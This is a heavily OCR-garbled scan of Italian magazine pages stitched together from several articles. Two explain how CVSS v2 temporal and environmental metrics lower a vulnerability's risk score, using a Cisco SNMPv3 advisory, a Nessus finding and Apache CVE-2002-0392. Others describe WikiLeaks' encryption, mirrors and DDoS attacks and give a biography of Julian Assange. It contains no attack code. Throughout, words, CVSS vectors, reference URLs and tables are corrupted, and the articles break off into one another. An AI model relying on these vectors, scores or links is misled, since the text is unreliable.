dal nist [31. 



della vulnerabilità e sull'affidabilità 
dei dettagli tecnici diffusi. Più alto è 
tale livello, maggiore è il rischio. 
UNCONFIRMED (UC): Esistono 
solo voci non confermate sulla 
vulnerabilità. 

UNCORROBORATED |UR): VI sono 
più fonti non ufficiali, tra le quali 
aziende indipendenti che operano 
sulla sicurezza o ricercatori, che 
descrivono la vulnerabilità. 
CONFIRMED (C): La vulnerabilità 
è confermata ufficialmente dal pro- 
duttore o dalia pubblicazione delle 
sue caratteristiche tecniche o dei 
metodi di attacco. 

NOT DEFINED (ND): La metrica non 
viene considerata nel calcolo dei la 
valorizzazione- 



contromisura non ufficiale. 
UNAVAILABLE [U): Non esistono 
contromisure o le stesse non sono 
applicabili. 

NOT DEFINED (ND): La metrica non 
viene considerata nel calcolo della 
valorizzazione. 

Indica il livello veridicità sull'esistenza 



Come esempio di calcolo delle 
metriche temporali prendiamo 
la Cisco Security Advisory; 
SNMP Version 3 Authentication 
Vulnerabilities , già utilizzata per le 
metriche di base. 

Explflitabiiity | Cpmplexity | fluttienticaton 
pjncljwial Official-Fix Confirmed 



Da questi dati risulta un CVSS Score 
- 8.3. Il vettore è il seguente: 

E:F/RL:OF/RC:C 

L'utilizzo delle metriche temporali 
fa si che il livello di rìschio venga 
mitigato da 10 a 8.3- 



METRICHE 
□ I AMBIENTE 



Le metriche d'ambiente collegano il 
rischio precedentemente calcolato (si 
usi o meno il vettore temporale! alle 
differenti realtà aziendali. 



Environmentgl 
Metrìc Group 




Pottntial J| 


f Ccnfidi-nC-'nIiiY 
far?, UM-Piìifiir 












' Avit!»b"liry 







Misura il danno potenziale ohe l'azienda 
può subire a causa dalla vulneraci ita. 
NONE (N|: Danno inesistente 
LOW (LJ; Danno minimo. 
LOW-MEDIUM (LM): Danno moderato. 
MEDIUM-HIGH (MHJ; Danno grave 
HIGH (HJ: Danno catastrofico. 
HOT DEFINED (ND): La metrica non 
viene considerata nel calcolo della 
valorizzazione. È compito di ogni 
azienda definire, nella sua realtà, il 
significato dei livelli di danno atteso. 

ìfe^MlBi^aip^ 

Indica (a percentuale di danno atteso 
sul sistema in rapporto al numera degli 
asset clie possono essere danneggiati- 
NONE (Nj: Nessun asset coinvolto. 
LOW (L]s Tra 11% ed il 25% di aset 
coinvolti. 

MEDIUM (M): Tra f 26% ed il 75% CS 

aset coinvolti. 

HK3H (H): Tra 176% ed il 100% di aset 
coinvolti. 

HOT DEFINED (ND]: La metrica non 
viene Considerata nel calcolo della 
valorizzazione. 

Valorizza le necessità aziendali in Termini 
di riservatezza, integrità e Disponibilità. 
Anche se la tabella accorpa I tre requisiti, 
vamo valorizzati separatamente. 
LOW flj: Impatto limitato. 
Medium (M): Impatto grave. 
HIGH IH): Impatto catastrofico 
HOT DEFINED (ND): La metrica non 
viene considerata nel calcolo della 
valorizzazione. 

Come esempio di calcolo delle 
metriche d'ambiente prendiamo 
la Cisco Securfty Advisory: 
SNMP Version 3 Authentication 
Vulnerabilities, già utilizzata per le 
metriche di base. La valorizzazione 
dei parametri, in questo caso, è di 
stretta competenza dell'azienda. 
Ipotizziamo un'azienda che abbia 1 
requisiti seguenti: 



Da questi dati risulta un CVSS Scare 
- 6.6, Il vettore è R seguente: 

CDP;LMAD;M,/r.R;M/IR:M/AR:M 

L'utilizzo delle metriche temporali e 
di quelle d'ambiente fa sì che il livello 
di rìschio venga mitigato da 10 a 
6.6. Se vogliamo considerare solo le 
metriche di base e quelle d'ambiente, 
lo score passa da 1 0 a 7.5. Uno 
di questi è il valore reale legato al 
rìschio della vulnerabilità in esame 



CALGDLD DEL 
CO RRETTD. FATTORE 
DI RISCHIO 



Dell'uso dei report di Nessus 
nell'analisi dei rischi abbiamo pariate) 
in un precedente lavoro [4], vediamo 
ora come utilizzare in maniera più 
consona alla realtà sotto esame 
tale prodotto. Supponiamo di aver 
fatto girare Nessus sulla nostra rete 
intema e di trovarci di fronte, tra 
l'altro, alla seguente segnalazione: 



Come si può notare n livello 
base di rischio de! CVSS è aito 
e richiederebbe un intervento 
immediato. E' chiaro che le metriche 



Cullatemi 
Damale 
Potential 


Target 
DÉstributiOn 


Riservatezza 


Integrità (IR) 


Disponibilità 
(ARI 


Lcw-Mediurn 


Medium 
(26-75%) 


Medium 


Medium 


! 

Medium 



temporali, in questo caso, non ci 
servono, perché il report ci dice che 
anche se la soluzione al problema 
esiste, non è stata applicata. 
Ma l'importante, per dirigere gli 
sforzi verso i reali obiettivi primari 
è valutare il rischia legato al mio 
ambiente. Raccogliamo dal National 
Vuinerability Database (nvd) [5] i 
dettagli per l'analisi. La parte che ci 
interessa dice: 



Analizziamo, ora, dove è allocato 
il server, quale danno può subire 
e cosa tratta: Il server è sulla rete 
locale, tratta dati che possono 
procurare all'azienda un danno 
limitato, tratta dati pubblici non 
essenziali, quindi noti richiede 
riservatezza e le esigenze di 
disponibilità sono limitate, mentre 
è Importante l'integrità delle 
informazioni. In caso di problemi 



LE METRICHE 
D'AMBIENTE 
CDLLEEAND IL 
RISCHIO ALLE 
DIFFERENTI 
REALTÀ 
AZIENDALI 



■ 
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RETI/DIFFICILE 



gli asset coinvolti riguardano un 
percentuale, sul totale esaminato, 
minore del 10%. 

Compiliamo la tabella delle metriche 
d'ambiente: Utilizzando il tool gratis 



NVD provi des severity rankings of 
"Low," "Medium," and "High" in 
addition to the numeric CVSS scores 
but these qualitative rankings are 
sìmply mapped from the numeric 



Collatersl T , 
pSi i 0MM °» 


Riservate zia 




Imi 


Lim (0-25%) 


Uw 


Matita) 


Imi 



reperibile su internet per calcolare 
il CVSS [6] verifichiamo il rìschio 
effettivo per noi, tralasciando le 
metriche temporali, perché, come 
visto, non entrano in gioco. Da questi 
dati risulta un CVSS Score -1.7 
il vettore è il seguente: 



CDP:L/TD:L,/CR:L/IR:M/AR;L 



c 

di 
ne 

I 



Controllando la metodologia NVD 
di suddivisione del CVSS Score 
notiamo i seguenti accorpamenti: 

TOWìirsÈaEì?§3n3Sì7SMlsi@ 



CVSS scores: 

1. Vulnerabilities are labeled "Low" 
severità ìf they have a CVSS base 
score of 0.0-3.9. 

2. Vulnerabilities will be labeled 
"Medium" severity if they have a 
base CVSS score of 4.0-6,9 

3. Vulnerabilities will be labeled 
"High" severity if they have a CVSS 
base score of 7.0-1 0-0. 

Possiamo quindi notare come 
lo score riportato da Nessus, 
senza verifica dell'ambiente, sia 



classificabile come "HIGH" , mentre 
quello reale, riscontrato sul campo, 
ci riporta ad uno score "LOW": 
questo ci consente di classificare 
correttamente lo priorità degli inter- 
venti correttivi da eseguire. 



Riferimenti 

[1] lTttp;/A™w.first.orjj/cvss/ 

P] ìtttp://www,clsco-C(irn/warp/pjblic/7C)7/ 

cisco-sa-20080610-Enmpv3.srrtrnl 

[3] http ://web , mi , nlstcovrtiew/YUIn/ 

deteil?vulnld=Cvt-20<J8-0g6D 

[4] Francesco Merlo, Fabio Guasconi - 

Dispensa analisi dei risolti 

15] http iffwetl - nvd . rist.gov/viswrtL In/ 

detaii?exeoitiwi=elsl 

[6] http://jwirss.iK.cJ™-uac,jp>jtg/intfex. 

en.html 

[7] http://wvw.5ecuritylMus.corn/ 



nessus utilizza come indicatore del 
livello di rischio per le vulnerabilità 

!n d i vi d uate il rlsk factdr base del 
Common Vulnerability Scoring System 

(CVSS) 




T\f 
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IL CALCOLO m RISCHIO SES1SU0 



REPCJRT 
Ddpd AVERE 

capito, nel 
precedente 
numero di 
Hacker Jdurnal 
come utilizzare 
IL Cdmmdn 
VULNERABILITY 

S cdrìne System 

PER IL CALCE) LO 
DEL RI5CH1D 
EFFETTIVO DI UNA 
VULNERABILITÀ, ~ 
PASSIAMO DRA 



AD UN ALTRE) 

TEMA MOLTO 

INTERESSANTE. 

IN QUALCHE MODO 

CRUCIALE, 



OVVERO 

□□ME CALCOLARE 
tL RISCHIO 
RESIDUO. ■■ 




Nel precedente artìcolo 
[Il fattore di rischio 
Hacker Journal 209) 
abbiamo illustrato 
come utilizzare 
correttamente il CVSS 
per calcolare il rischio effettivo di 
una vulnerabilità nella realtà sotto 
esame con l'utilizzo delle metriche 
d'ambiente. 

Con questo scritto completiamo 
l'argomento vedendo come 



calcolare anche il rischio 
residuo, ii rischio, 
cioè, che permane 
dopo l'adozione 
delle opportune 
contromisure: a tal fine 
utilizzeremo le metriche 
temporali. Riteniamo 
utile riproporre, per 
semplificare la lettura, 
quanto scritto riguardo le 
stesse. 




I rischi legati alle 
vulnerabilità cambiano 
con il passare dei tempo, 
in base allo sviluppo di 
tecniche per sfruttare 
le vulnerabilità stesse 
ed alla individuazione 
e realizzazione delle 
relative contromisure. 
Le metriche adottate 
per la valutazione sono 
riportate nella fig.1 




Z". '""tifar fÉÉfJ^ 

-t — RETI/DIFFICILE 

jdC ni 



EXPLD ITABI LITY (E) CVS S : RI EPI !_□ GLI 



IL CALDO LD DEL 
ÌISCH1D RESIDUO. 



Indica lo Stalo dell'arte delle tecniche Torniamo brevemente, prima di 

per sfruttare la vulnerabilità. proseguire, sul concetto di CVSS per 

Più è facile l'attuazione dell'attacco, coloro che avessero perso il numero 

maggiore è il ì rischio. precedente di HJ. 



Riprendiamo in esame l'esempio 
dell'articolo precedente: 



Valorizzazione 



Prcof-of-Crjneept(POC) 



Fiincfiwial (F) 



EMEDIATiDN 
LEVEL (RL) 



Indica il livello di maturità delle 
contromisure. Minore è il livello piti 
alto è il rischio. 

Valorizzazione 



Workaround (W) 
Unavailable (U| 



Descrizione 



La recntea e stata tesiam ma non e attuatelo per la 
maggior parta dei sistemi senza personalizzazioni 
da parte di un attirante esperto. 

La tecnica esìste ed é efficace sulla maggior 
parte dei sistemi affetti dalla vulnerabili. 

La tecnica esiste, o noi) è richiesta, e si attiva n 
maniera autonoma {es. «orni o virus). 

La metrica min viene considerata nel calcolo 
della valorizzazione. 



I! Common Vulnerabìlity Scorino, 
System Version 2.0 può essere 
considerato, a tutti gli effetti, una 
analisi dei rischi minimali per il 
trattamento delle vulnerabilità 
relative al mondo internet. Opera 
con tre gruppi di metriche: Base, 
Tempora!, Environmental. 

Descrizione 



Esiste una contromisura non ufficiale. 

Non esistono contromisure o le stesse 
non sono applicabili, 

La metnea non viene considerata nel calcolo 




I parametri base risultano i seguenti: 

Access: Network 
Vactor: Network 
Access Complexity: 
LowAuthentìcation: None 
Corrfidentiairty Impact: Partisi 
integrity Impact: Partia! 
Availabìlity Impact: Partisi 

I I vettore di rischio, ed il Suo livello, sono: 

AV: N/AC : I/Ali : N/C: P/I : (VA: C CVSS 
Score - 7.5 

Abhiamo impostato i parametri del 
rischio legato all'ambiente sotto 
esame come segue: 



REPORT 
□ □NFIDENCE IRCI 



Indicai! livello veridicità 
sull'esistenza della vulnerabilità e 
sull'affidabilità dei dettagli tecnici 
diffusi. Più alto è tale livello, 
maggiore è il rischio. i 



Valorizzazione 



[incenfirmed ( 



Confi nmedlC) 



Esistono solo voci non consumiate Sitila 
vulnerabllltà. 

VI sana più fonti non ufidalL Ira le eguali aziende 
indiacnderti che operano sulla scurezza o 
rfcercatori, che descrinonc la «yliieiaislità. 

La vulnerabilità è confermata ufficialmente 
dal produttore e dalla pi, cb ienzi:™ delie sue 
caratteristiche tecniche o dei metodi di ataccc 
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CoHateral Damage Potential (CDPJ: Low. 
Target Distrlbution (XD): Low (0-25%). 
Riservatezza (CR): Low. 
Integrità (IR): Medium. 
Disponibilità (AR): Low. 

Vettore di rischio ù livello: 

CDP:L/TD:L 3 /CR;L/IR:M/AR:L CTSS 
Score - 1.7 

Calcoliamo ora il vettore per le 
metriche temporali. Per acquisire le 
informazioni necessarie a valorizzare 
il vettore dobbiamo effettuare alcune 
ricerche su Internet In assenza di 
dati, a volte succede, dobbiamo 
utilizzare fonti alternative o la nostra 
esperienza. Sappiamo che il codice 
di vulnerabilità è: 

CVE-2002-0392 

E che utilizziamo Apache versione 
2,0.36; con questi dati, e un po' di 
pazienza, possiamo iniziare le nostre 
ricerche. Per prima cosa verificiliamo 
sul sito del MITRE le informazioni 
disponibili: 



Dai dati fomiti risulta che la 
vulnerabilità è ufficialmente 
confermata, quindi: 

Exploìtcbility - Funrtional 
Authentìcation = Cortfirmed 

Verifichiamo ora, sul silo ufficiale 
di Apache, la situazione delle 
opportune contromisure: 




La versione da noi utilizzata è la 
2.0.36, quindi andiamo alia pagina 
relativa: 




si ottiene un CVSS Score - 1.4, che è 
il nostro rischio residuo, 
Uti a via più breve, ma meno ricca di 
informazioni, consiste nell'accedere 
al sito del NIST, usando come 
parametro di ricerca il OVE. 



Risulta che ©Siste una contromisura 
ufficializzata, quindi: 

Conplexity ■ Gffidol-Fix 



Riepilogando: 




Exploitability 



Compleiity 



Authentication 



Il vettore è il seguente: 

E:F/RL:0F/RC:C 

Il calcolo viene effettuato utilizzando 
il tool, gratuito, CVSS V2.0 Calcuiartor 
for PC scaricatile dal sito. 
http://jvnrss.ise,chuo-u.ac,jp/jlg/ 
cvss/en/i ndex.02.html 

Utilizzando i parametri; 



Vector Corsi plexity 



Autenticatigli 



Note: nella prima parte dell'articolo, 
pubblicata su! numero ZOS di 
Hacker Journal, non è sfato 
riportato fra gli autori il nome 
Francesco Merlo che risulta essere, 
tra l'altro, il principale artefice di' 
questo doppio contributo dedicato 
all'analisi delel vulnerabilità. 

Ce ne scusiamo pubblicando in 
questa sede la doverosa rettifica, 

Gonfidentiaiity Integri!? AvailaKBty 
Impact Impact Impact 
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LE TECNICHE Di 
WIKILEAKS PER 
CRIPTARE LE 
IN FORMAZIONI E 
GLI ATTACCHI 
PDS IN QUESTO 
' RICCO DDSS1ER 
DEGNO DI UNA 
5PY STORY. 



Ormai tutti conoscono 
il volto di Juliari 
Assarge, giornalista 
portavoce ufficiale di 
Wikiieaks, grazie alla 
tempesta mediatica 
scatenatasi nelle ultime settimane 
a seg mito della pubblicazione Sul 
suo sito dei documenti riservati 
relativi alla guerra in Afghanistan 
e alle relazioni diplomatiche degli 
Stati Uniti degli ultimi cinquanta 
anni. Questa seconda pubblicazione 
ha portato alla luce lo scorso 28 
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novembre, ben 251,287 documenti 
confidenziali, denominati cable, 
decretando una crisi diplomatica di 
imprevedibili conseguenze. 
Poco o nulla è stato detto però dai 
media del lato tecnico relativo alla 
struttura del sito web, degli hacker 
che lo gestiscono e degli attacchi 
che stanno sconvolgendo internet. 
Proprio per la sua natura, infatti, 
Wikiieaks non parla molto delle 
sue difese, mentre rappresenta lo 
stato dell'arte per la gestione e la 
protezione deile informazioni. 




[E Ecco come si presenta l'ascesso al sito 
V ' *' Wonen: all'iotmo delia montagna è 
{fin presente II data center. 

La sua natura giudicata apertamente 
pericolosa, ne ha costituito sin 
dall'inizio un bersaglio per gruppi 
di pirati informatici al soldo o 
meno delie intelligence di tutto il 
mondo. Per tutelarsi da possibili 
oscuramenti totali, già lo scorso 
agosto era stato diffuso tramite 
sito web s reti p2p tutto l'archivio 
digitale di Wikileaks cifrato in 
AES256, senza rilasciare la 
password {archivio da 1,4Gb noto 
come Wikileaks Insurance File), 
Essa sarebbe stata resa pubblica 
nel caso in cui il sito fosse sfato 
compromesso. Qualcuno ha 
ipotizzato che fosse un bluff, 
ma di certo ha funzionato come 
deterrente. 

Wikileaks, da sempre soggetto a 
questi attacchi, per mantenersi 
online deve essere continuamente 
monitorato e ha come location 
principale i server del provider 
Banhof (www.bahnhof.se), 
all'interno di un bunker nella catena 
" montuosa ctiiamata Pionen, da 
' cui prende il nome, Si tratta di un 
vero e proprio bunker ariti attacco 
atomico degli anni Settanta che è 
stato convertito in data center. Tra 



Nonostante la location di tutto 
rispetto, i server per la natura stessa 
di internet, non possono essere 
immuni ad attacchi Ddos e proprio 
in questi giorni sono nati numerosi 
nuovi mirrar di wikileaks, a seguito 
della chiusura dei principali siti 
wikileaks.org e wikileaks.net su 
pressione del governo americano, 
nel tentativo di oscurare e zittire 
Wikileaks. 

E' possibile trovare facilmente 
uno di questi mirrar ufficiali e 
non. andando all'indirizzo http:// 
wikileaks. info, attualmente attivo, 
mentre è Stato aperto un nuovo 
indirizzo ufficiale con il dominio 
wikileaks. cti, con segnalati tutti i 
mirror ufficiali all'indirizzo wikileaks. 
ch/mirrors.html. Per l'esattezza sì 
tratta eli 1559 mirror, numerosi dei 
quali implementano l'IPv6! 

LA CENSURA 
E L'ANONIMATO 



Wikileaks é considerato una 
concreta minaccia alla sicurezza 
degli Stati Uniti. A dirlo sono stati 
proprio i servizi segreti americani 
che hanno stilato un dossier 
riservato di 32 pagine datato 18 
marzo 2008, dal titolo 'Wkileaks.org 



emblematica dei Time cheta utittzzato la 
bandiera americani per chiudergli ia bocca. 

Alla chiave dei successo di 
questa raccolta c'è la garanzia 
all'anonimato delle fonti che 
risiedono in tutto il mondo e 
possano fornire le informazioni 
tramite internet, Come si legge 
nel documento, chiunque può 
postare informazioni grazie 
al sistema Wiki senza alcuna 
revisione editoriale o supervisione 
volta ad appurare la verità delle 
notizie riportate. Un sistema senza 
censure in pratica, E' evidente 
che tale struttura possa prestarsi 
a facili critiche, dal momento che 
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i contenuti (apparentemente] non 
sono sottoposti ad alcuna verifica, 
tuttavia è proprio l'assenza di 
censura e la garanzia dell'anonimato 
ohe ne ria decretato la potenza 
esplosiva dal punto di vista 
mediato. E Wikileaks assicura dì 
effettuare opportuna verifiche sui 
documenti ricevuti. Molti paesi, già 
prima del "Cable-gate", ossia la 
diffusione dei messaggi scambiati 
tra i diplomatici americani negli 
ultimi 50 anni, avevano deciso di 
bloccare l'accesso a Wikileaks. 
org, Tra questi la Cina, Israele, 
la Corea del Nord, la Russia, la 
Tailandia e lo Zimbabwe. Cina, 
Israele e Russia pretendono infatti 
dì poter modificare autonomamente 
i contenuti pubblicati per perseguire 
le fonti, nonostante Putin dichiari 
inaspettatamente di essere 
contrario all'arresto di questi 
giorni dì Assange. L'anonimato 
Offerto da Wikileaks è garantito 
dall'ufilizzo delle moderne 
tecnologie, ma soprattutto dalla 
fiducia che lega chi pubblica e chi 
fornisce le informazioni riservate. 
Per proteggere l'anonimato 
sono impiegate le piattaforme di 
Wiki e MediaWiki (alla base del 
funzionamento del silo web) e 
i protocolli QpenSSL, FreeNet, 
TOR, e crittaggio PGP per cifrare 
e rendere impossibile risalire al 
punto di accesso iniziale alla rete 
dei contenuti diffusi. Oltre alla 




diffusione via internet, le fonti 
anonime delle informazioni possono 
trasmettere ovviamente i contenuti 
tramite vecchi e Sicuri metodi, come 
quello di inviare tramite posta CD o 
DVD cifrati ai volontari che lavorano 
per Wikileaks e che proteggendo 
l'origine delle informazioni, girano 
a loro volta I contenuti a chi è 
autorizzato a pubblicare i contenuti 
online. Una catena di tramissione 
basata chiaramente sulla fiducia che 
le parti ripongono tra loro. 

I DOCUMENTI 



La quantità dei documenti fuoriusciti 
è talmente ampia da aver richiesto 
lo sviluppo di software appositi 
da parte di Assange e dei suoi 
collaboratori, volti a catalogare e 
indicizzare le informazioni. Tra le 
funzioni base di questi software ad 
esempio, l'espansione automatica 
degli innumerevoli acronimi utilizzati 
ad esempio per i documenti riservati 
sulla guerra in Afghanistan. 
Tramite un'intensa attività di SQL 
e di pubblicazione di articoli è 
ora disponibile un database che 
permette di svolgere ricerche 
approfondite sulle oltre 2000 pagina 
riservale, ora a disposizione di 
chiunque. E le informazioni rivelate 
sono particolarmente esplosive. 
Per fare qualche esempio, tra le 



informazioni portate alla luce: 
centri nevralgici dei servizi segreti 
americani, operazioni su detenuti e 
presunte violazioni di diritti umani 
a Guantanamo, informazioni sul 
Dipartimento di Stato, le Forze Aree, 
la Marina e le unità dei Marines degli 
Stati Uniti, sulla polizìa irakena e 
le forze di coalizione della Polonia, 
Danimarca, Ucraina, Lettonia, 
Slovacchia, Romania, Armenia, 
Kazakistan e El Salvador che hanno 
svolto servizio in Iraq e Afghanistan, 
quasi l'intero ordine di battaglia 
delle forze americane in Iraq e 
Afghanistan alla data di Aprile 2007, 
presunte rivelazioni relative alia 
violazione da parte degli Stati Uniti 
della convenzione sull'uso delle armi 
Chimiche in Iraq e Afghanistan. 
Dopo aver indicizzato i contenuti, 
gli sviluppatori software hanno 
rintracciato in rete gli acronimi 
utilizzati dalla NATO per validarè a 
campione le pagine. Manualmente 
sono state poi create delle liste di 
parole chiave utili a navigare tra i 
contenuti. Con l'utilizzo di scripting 
basato su VIM, PERL e programmi 
Python, tutto il materiale è stato poi 
organizzato in fogli di calcolo che 
hanno permesso una visualizzazione 
semplificata. Con successive 
fusioni, sono stati inclusi fogli di 
calcolo della logistica della NATO 
e acronimi utilizzati dalla logistica 
militare americana e il tutto è stato 
riversato nuovamente in SQL. 
Questo ha permesso ad esempio 
di ottenere informazioni accurate 
di tipo economico sugli apparati 
militari e sulle operazioni stesse di 
guerra. 

rjLrTrrrÀCCHi 



Il dossier si spinge ben Oltre l'analisi 
di Wikileaks definendo possibili 
falle che potrebbero portare al 
controllo del sito web, Viene 
Chiaramente evidenziato ohe le 
tecnologie utilizzate per rendere le 
comunicazioni cifrate hanno delle 
vulnerabilità che possono essere 
"exploitate" e che organizzazioni 
dotate di tecnici opportunamente 
addestrati, in possesso di sistemi 
e software appopriati, potrebbero 
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portare a buon fine attacchi in grado 
di prendere il contralto del sito. Come 
a dire Ira le righe, che i servizi segreti 
sono pronti a intervenire per spegnere 
immediatamente Wikileaks. 



Y<^* Nel grafico è possibile osservare il 
down!ime dì olire 24 ore causalo a 
fygjjy Wikileaks subito tìopo la pubblicazione 
Mmmm tlèl documenti iienomimil "cable-gate". 



E' inoltre evidenziato ohe analisi 
digitali di tipo forense sui documenti 
e sulle reti coinvolte per la 
trasmissione dei dati potrebbero 
permettere di risalire alle località 
di origine utilizzate per diffondere 
i Contenuti riservati fuoriusciti e 




Tarfcrt: 

Wicn; h h-.ri .. 



per risalire agli indirizzi IP dei 
computer coinvolti, fino ai MAC 
delle schede di rete di partenza, 
sono tali da essere ir possesso dei 
soli programmatori che si occupano 
di Wikileaks. Un'affermazione forse 
azzardata, ma che rende bene 
l'idea del livello di esperienza dei 
collaboratori di Julian Assange, 
Lo stesso sito web ha alle spalle un 
lavoro continuo volto ad assicurarne 
la disponibilità online, nonostante i 
continui attacchi informatici. 
Sui versante politico, diverse nazioni 
tentano di rendere illegale la stessa 
consultazione del sito web e il 
download dei contenuti in esso resi 
disponibili, bloccandone l'accesso. 
Su quello giurisprudenziale, al 
contrario, ci si chiede anche 
negli Stati Uniti se debba essere 
costituzionalmente permesso 
di poter accedere a queste 
informazioni in relazione alla libertà 
di parola e di stampa, 



IL FUTURD 



Wikileaks aspira a divenire una voce 
autorevole indipendente e priva di 
censure cui chiunque può rivolgersi 
per denunciare tutte quelle notizie 
che i potenti più o meno in vista 
vorrebbero fossero taciute, 
Wikileaks ora ha aperto anche uno 
spiraglio sul mondo nascosto dei 
servizi segreti e delle diplomazìe, 



rendendo palese agli occhi del 
mondo le forze in gioco per gli 
equilibri polìtici del pianeta. Gli 
attacchi continui perpetrati nei 
confronti del sito web, l'arresto 
del suo portavoce ; la chiusura dei 
conti bancari e degli account pay- 
pal dei sostenitori di Wikileaks 
danno invece la dimensione degli 
interessi economici coinvolti dietro 
a tali movimenti politici. E ora il 
mondo è in attesa di conoscere le 
sorti di Julian Assange, attualmente 
detenuto in Inghilterra, ma per il 
quale probabilmente si sta cercando 
il modo di estradarlo negli USA, 
Al di là delle informazioni rilasciate 
sembra sempre più necessario 
assicurare la massima libertà a 
internet come mezzo principe 
per la libertà di espressione a 
disposizione di ognuno, Forse sarà 
proprio il caso di Wikileaks a creare 
nell'opinione pubblica un forte 
desiderio di indipendenza della rete 
da tutti i governi. Quello che ogni 
hacker vorrebbe. 
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WikiLeaks is a 
non-profit media 
oro,anization 
dedicateci to 
bringing innporlant 
news and 
information to the public, We provide 
an innovative, secure and anonymous 
wayfor independent sources around 
the world to leak informatiori to our 
journalists. We publish material 
Of ethical, politicai and historical 
significante whiie keeping the 
identity of our sojrces anonymous, 
ttius providing a Lniversal way far 
the revealing of suppressed and 
censored Snjustices. Questo è il 
messaggio che campeggia nella 
home page di Wikiieaks il sito che 
è riuscito a sollevare uno tsunami 
mediatico di proporzioni inaudite 
pubblicando documenti diplomatici 
statunitensi riservati e confidenziali 
che hanno sollevato, per il contenuto 
spesso "imbarazzante" , una serie 
di polemiche a catena. WikiLeaks 
(dall'inglese "leak", "perdita", "fuga 
[di notizie]") è un'organizzazione 
internazionale senza scopo di lucro 
che riceve in modo anonimo, grazie 
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a un contenitore (drop box) protetto 
da un potente sistema di cifratura , 
documenti coperti da segreto {segreto 
di stato, segreto militare, segreto 
industriale, segreto bancaria) e por li 
carica sul proprio sto web, WikiLeaks 
riceve, in genere, documenti di 
carattere governativo o aziendale da 
fonti coperte dall'anonimato, 



WIKILEAKS 



Dietro ii sito di Wikileaks c'è la figura 
controversa di Julian Paul Assange, 
australiano, 39 anni, buona parte 
dei quali dedicati proprio all'etica 
hacking. Assange giovanissimo entra 
a far parte, verso la fine degli anni 
ottanta, di "International Subversives" 
(Sovversivi internazionali) un gruppo 
di hacker intemazionali ben noto alle 
cronache. Egli utilizza lo pseudonimo 
di "Mendax" (da una frase di Orazio: 
"magnificamente mendace 1 '). 
Assange viene definito Giornalista, 
programmatore, attivista, però forse 
la parola ohe meglio lo descrive 
è anarchico. Non si riconosce nel 
sistema, lo combatte, Ne combatte le 
regole e proprio per questo i suoi guai 
con la giustizia iniziano molto presto. 
Nel 1991 subisce un'irruzione nella 
sua Casa di Melbourne da parte della 
polizia federale australiana. L'accusa 
è quella di avere violato, via modem, 
diversi computer appartenenti a 
un'università australiana e di essera 
entrato nei sistema informatico del 
Dipartimento della Difesa americano 
(peraltro un'incursione definita 
periferica che non ha violato i centri 
nevralgici del sistema). Nel 1992 gli 
vengono rivolti 24 capi di accusa 
di hacking. Assange è condannato, 
ma in seguito è rilasciato per buona 
condotta, dopo aver pagato una 
multa di 2.100 dollari australiani. 
Tanto per rimanere in tema nel 
1995 programma un pori scannino 
open source chiamato software 
Nel 1 997 collabora alla stesura 
del libro Underground: Tales of 
Hacking, Madness and Obsession 
on the Electronic Frontier. Dopo un 
periodo di studio non particolarmente 
fruttuoso (non coronato dalla 
laurea), tra il 2D03 e il 2006, presso 
la facoltà di fisica e matematica 



all'Università di Melbourne, ii suo 
impegno Si rivolge decisamente 
al sito WtkiLeaks.org di cui è tra i 
promotori nel 2007. Tecnicamente 
Assange si definisce "solamente" 
caporedattore di WikiLeaks ma i suoi 
meriti e. soprattutto i suoi "poteri" 
vanno ben oltre. WikiLeaks è una sua 
creatura fortemente compenetrata 
nel suo modo di essere, spesso 
al di fuori delle regole statutarie, 
questo appare ben evidente a tutti, 
specie i suoi detrattori e alfa giustizia 
internazionale, 



BRANDE 
VISIBILITÀ, GRANDI 
PRd B LEM [ 



□a un grande potere derivano 
grandi responsabilità. Lo dice Peter 
Parker, al secolo l'Uomo Ragno, 
e a questa massima non si può 
sottrarre neanche Julian Assange i cui 
piccoli guai con ia legge diventano 
decisamente più consistenti mano 
mano che la popolarità di WikiLeaks 
cresce. Il 1 8 novembre 2010 il 
tribunale di Stoccolma spicea un 
mandato d'arresto in contumacia nei 
suoi confronti con l'accusa di stupro, 
molestie e coercizione illegale. La 
vicenda viene poi ridimensionata 
nei contorni. In realtà ad Assange 
sarebbe stato contestato il rifiuto 
di sottoporsi ad un controllo 
medico sulle malattie sessualmente 
trasmissibili dopo aver avuto rapporti 
sessuali non protetti con due donne 
consenzienti, reato punibile in Svezia. 
Una delle donne coinvolte è Anna 
Ardin, una militante femminista 
e segretaria dell'associazione 
Brotherhood Movement. Il 20 
novembre viene spiccato, sulla scorta 
di questa accusa, un mandato di 
arresto internazionale tramite Interpol 
dalla forza di polizia svedese. In 
aggiunta è stato diramato un mandato 
di arresto nell'Unione Europea tramite 
il Sistema di Informazione Schengen. 
Si arriva così alla data fatidica: il 26 
novembre 2010, WikiLeaks rende 
di pubblico dominio oltre 251 .000 
documenti diplomatici statunitensi, 
mofti dei quali etichettati come 
"confidenziali" o "segreti" che 
destano un grandissimo clamore, Si 



ipotizza Che con ia pubblicazione dei 
documenti siano state violate una 
serie di leggi internazionali, ma siamo 
ancora nel campo delle ipotesi tutte 
da verificare, Quello che è invece 
concreto è l'arresto di Assange 
die il 7 dicembre 2010 Assange si 
presenta spontaneamente negli uffici 
di Scotland Yard e viene trattenuto 
in seguito ai mandato di cattura 
internazionale per i fatti a sfondo 
sessuale. Di fatto l'unica accusa 
realmente pendente ad oggi Sul Suo 
capo. Infine, il 18 dicembre, viene 
scarcerato a seguito del pagamento 
di una cauzione di 200,000 sterrine, 
messe insieme, almeno cosi Si dice, 
in massima parte dai suoi sostenitori. 
Ora l'udienza del processo a suo 
carico è attesa per l'1 1 Gennaio. 



VITTIMA □ 
CARNEFICE? 



La risposta non è semplice, L'attività 
di Assange è indubbiamente molto 
fastidiosa per i "potenti" di ogni 
paese del mondo e le finalità etiche 
che la sorreggono di base si possono 
considerare nobili, Ma ci Sono delle 
ombre che si fa fatica a dissipare 
completamente, Qualcuno ipotizza 
che tutto questo teatrino sia stato 
allestito ad arte per raccogliere fondi 
milionari, quindi anche per scopi 
di lucro, C'è poi chi alza il dito sui 
sostenitori e ipotizza Che alcuni 
finanziatori siano organizzazioni, 
anche grossi editori, i cui scopi 
potrebbero essere quelli di utilizzare 
l'attività investigativa del sito per i 
propri vantaggi. Insomma bianco 
o nero? Paladino o speculatore? 
Ai posteri la sentenza, Intanto sul 
sito WikiLeaks si può scaricare un 
documento compresso di qualche 
MB che contiene tutti i 251 .000 
torrent che consentono di scaricare 
altrettanti documenti, tutti quelli finora 
resi pubblici dal sito. Un'ondata di 
rivelazioni difficile da contrastare 
perché non basta più chiudere 
WikiLeaks per arginare la diffusione 
